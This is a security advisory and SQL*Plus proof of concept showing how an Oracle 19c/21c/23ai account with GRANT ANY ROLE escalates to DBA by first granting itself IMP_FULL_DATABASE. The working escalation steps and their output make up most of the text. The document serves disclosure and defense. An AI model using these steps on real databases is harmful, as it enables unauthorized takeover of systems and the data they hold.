📄 Oracle 23ai / 21c / 19c Privilege Escalation

Title: Oracle 23ai Privilege Escalation From GRANT ANY ROLE To DBA Role
    Vendor:                   Oracle
    Product:                  Oracle database system
    Affected Version(s):       23ai , 21c , 19c
    Risk Level:                Medium
    Author of Advisory:        Emad Al-Mousa
    
    
    <Overview>:
    
    Privilege escalation is one of the most common exploit techniques hackers use to abuse and take over critical systems, database systems are very important to be protected against
    such attacks for data security and protection. The presented exploit highlights a security design flaw that system admins and DBA's should be aware of.
    
    
    *****************************************************************************************************************************************
    
    <Exploit Summary Details>:
    
    A database account granted the system privilege "GRANT ANY ROLE" , can be exploited to escalate/elevate to "DBA" role. 
    
    *****************************************************************************************************************************************
    
    <Proof of Concept (PoC)>:
    
    
    I will connect as SYS user and create a local database account called “tom” in pluggable database FREEPDB1 as shown below:
    
    sqlplus / as sysdba
    
    SQL> alter session set container=FREEPDB1;
    
    Session altered.
    
    SQL> create user tom identified by tom123;
    
    User created.
    
    SQL> grant create session to tom;
    
    Grant succeeded.
    
    SQL> grant grant any role to tom;
    
    Grant succeeded.
    
    SQL> alter user tom default role all;
    
    SQL> exit;
    
    Next, I will connect using tom account to the database directly using sqlplus:
    
    
    sqlplus "tom/tom123"@FREEPDB1
    
    Attempting to grant DBA role to myself will not work as expected [it will be blocked to prevent escalation attempt] !
    
    SQL> grant dba to tom;
    grant dba to tom
    *
    ERROR at line 1:
    ORA-01031: insufficient privileges
    
    
    Attempting to grant DBA role to another existing account “hr” in the database will not work also !
    
    SQL> grant dba to hr;
    grant dba to hr
    *
    ERROR at line 1:
    ORA-01031: insufficient privileges
    
    
    The account has limited power as shown below (can’t create another database account called “tom2” and can’t view any database table) so its limited in power:
    
    
    SQL> show user
    USER is "TOM"
    SQL>
    SQL> create user tom2 identified by tom123;
    create user tom2 identified by tom123
    *
    ERROR at line 1:
    ORA-01031: insufficient privileges
    Help: https://docs.oracle.com/error-help/db/ora-01031/
    
    
    SQL> select * from HR.DEPT;
    select * from HR.DEPT
                     *
    ERROR at line 1:
    ORA-00942: table or view "HR"."DEPT" does not exist
    Help: https://docs.oracle.com/error-help/db/ora-00942/
    
    The account can grant low-level built in roles such as “resource” role for example to another database accounts (as designed to do so):
    
    SQL> show user
    USER is "TOM"
    SQL>
    SQL> grant resource to hr_app;
    
    Grant succeeded.
    
    
    The security vulnerability/weakness problem is the ability of the account to escalate to DBA role as shown below:
    
    
    SQL> grant IMP_FULL_DATABASE to tom;
    
    Grant succeeded.
    
    SQL> set role all;
    
    Role set.
    
    SQL> grant dba to tom;
    
    Grant succeeded.
    
    
    Now, account TOM is elevated to DBA role successfully !!
    
    *****************************************************************************************************************************************
    
    <Remarks & Conclusion>:
    
    A database account with “GRANT ANY ROLE” should have the power to grant roles to “other” accounts. The above simple scenario shows that if the account gets compromised it can be easily elevated to “DBA” role.
    
    Make sure that accounts in your database systems with high system privilege permissions passwords are complex, long, and protected. And, of course security auditing will greatly help in detecting privilege escalation attempts in your landscape.
    
    
    *****************************************************************************************************************************************
    References:
    https://databasesecurityninja.wordpress.com/2025/07/02/oracle-23ai-privilege-escalation-from-grant-any-role-to-dba-role/
    https://docs.oracle.com/en/database/oracle/oracle-database/23/dbseg/configuring-privilege-and-role-authorization.html#GUID-FEC9C8E4-B935-405B-8994-9AC5A71C6DD7